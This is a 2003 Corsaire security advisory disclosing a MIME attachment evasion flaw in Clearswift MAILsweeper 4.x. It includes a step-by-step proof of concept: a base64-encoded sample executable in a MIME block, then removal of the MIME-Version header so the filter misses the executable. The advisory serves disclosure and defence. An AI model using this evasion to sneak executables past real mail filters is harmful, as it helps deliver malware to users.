Corsaire Security Advisory - Clearswift MAILsweeper MIME attachme nt evasion issue

– Corsaire Security Advisory –

Title: Clearswift MAILsweeper MIME attachment evasion issue
Date: 03.03.03
Application: Clearswift MAILsweeper 4.x
Environment: Windows NT 4.0, Windows 2000,
Author: Martin O'Neal [[email protected]]
Audience: General distribution

– Scope –

The aim of this document is to clearly define a MIME attachment evasion
issue in the MAILsweeper product, as supplied by Clearswift Ltd. [1]

– History –

Vendor notified: 03.03.03
Uncoordinated vendor advisory released: 05.03.03
Document released: 06.03.03

Unfortunately the release of this advisory has not followed a
particularly smooth path. The main reason for the rapid release schedule
is due to an uncoordinated and unattributed advisory from Clearswift,
released under their ThreatLab banner. Once this was made public, there
seemed little point in delaying publishing the Corsaire advisory.

For the record, the sole response we have had from Clearswift in regard
to this issue has been an apology from Pete Simpson (ThreatLab Manager)
for the unattributed release (received after we complained about the
omission). Other than this, no one from Clearswift has responded to the
original advisory, or any of the follow-up emails.

– Overview –

The MAILsweeper product provides policy based, email content security
functionality. Part of this functionality allows the product to block
attachments based on their specific content type.

However, by using malformed MIME encapsulation techniques this
functionality can be evaded.

– Analysis –

The attachment detection functionality works by recursively analysing
the email message body and attachments for container constructs (such as
MIME), decoding these and then comparing the contents against a
predefined policy.

If a deliberately malformed MIME encapsulation technique is used, then
the MAILsweeper product will not recognise the attachment and allows it
to pass unhindered.

However, not all client applications require strict standards compliance
and some will happily accept and process the malformed attachment.

– Proof of concept –

For this proof of concept, the MIME encapsulation is simply modified to
remove the MIME-Version header field. An example of an application that
will process a MIME construct that is malformed in this way is Microsoft
Internet Explorer.

Whilst RFC2045 states that all agents must include this field [2] it
then goes on to say that "In the absence of a MIME-Version field, a
receiving mail user agent (whether conforming to MIME requirements or
not) may optionally choose to interpret the body of the message
according to local conventions."

Step 1: On the MAILsweeper host create a new Data Type Manager with only
the Executable type selected. Save and restart the MAILsweeper Security
service.

Step 2: Now create a text file that will be used to hold the MIME
encoded attachment. Start notepad (or another text editor), and paste
in:

 MIME-Version: 1.0
 Content-Location:file:///executable.exe
 Content-Transfer-Encoding: base64

 TVp0AQIAAAAgAAgA//8YAIAAAAAQAAIAHgAAAAEAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAC4AQCO2I0WAgC0Cc0huCBMzSFFeGUhJCQJALH/
 /////wAAAAAAAFQBAAAAAAIAUkKL6IzABRAADh+jBAADB
 gwAjsCLDgYAi/lPi/f986RQuDQAUMuMw4zYSI7YjsC/Dw
 C5EACw//OuR4v3i8NIjsC/DwCxBIvG99DT6IzaK9BzBIz
 YK9LT4APwjtqLx/fQ0+iMwivQcwSMwCvS0+AD+I7CrIrQ
 Tq2LyEaKwiT+PLB1BazzqusGPLJ1bfOkisKoAXSxvjIBD
 h+LHgQA/DPSrYvI4xOLwgPDjsCti/iD//90ESYBHeLzgf
 oA8HQWgcIAEOvcjMBAjsCD7xAmAR1IjsDr4ovDiz4IAIs
 2CgAD8AEGAgAtEACO2I7AuwAA+o7Wi+f7i8Uu/y+0QLsC
 ALkWAIzKjtq6HAHNIbj/TM0hUGFja2VkIGZpbGUgaXMgY
 29ycnVwdAEAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAA=

Step 3: To reproduce this issue, send an email containing the attachment
created in step 2 that will be processed by the scenario from step 1.
This should result in a successful discovery condition.

Step 4: Reopen the attachment from step 2 and remove the first line
(MIME-Version: 1.0), then resend the attachment as per step 3. This
should result in the attachment not being spotted as an executable.

– Recommendations –

To be an effective tool, the MAILsweeper product must not only be able
to process encoding techniques implemented as per the relevant standard,
but also common misinterpretations.

As an ongoing process, a study project should be undertaken by
Clearswift to identify applications that routinely decode MIME objects
and have a liberal interpretation of the MIME standard.

In response to this advisory, Clearswift have produced an updated script
utility that can detect the malformed MIME header used in this example
[3]. This should be implemented until a more permanent solution is
forthcoming.

– CVE –

The Common Vulnerabilities and Exposures (CVE) project has assigned
the name CAN-2003-0121 to this issue. This is a candidate for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.

– References –

[1] http://www.clearswift.com
[2] http://www.rfc.net/rfc2045.html#s4.
[3] http://www.clearswift.com/support/threatlab/vbstool.asp

– Revision –

a. Initial release.
b. Minor revision.
c. Added CVE reference.
d. Added Clearswift script tool reference.

– Distribution –

This security advisory may be freely distributed, provided that it
remains unaltered and in its original form.

– Disclaimer –

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. Corsaire
accepts no responsibility for any damage caused by the use or misuse of
this information.

Copyright 2003 Corsaire Limited. All rights reserved.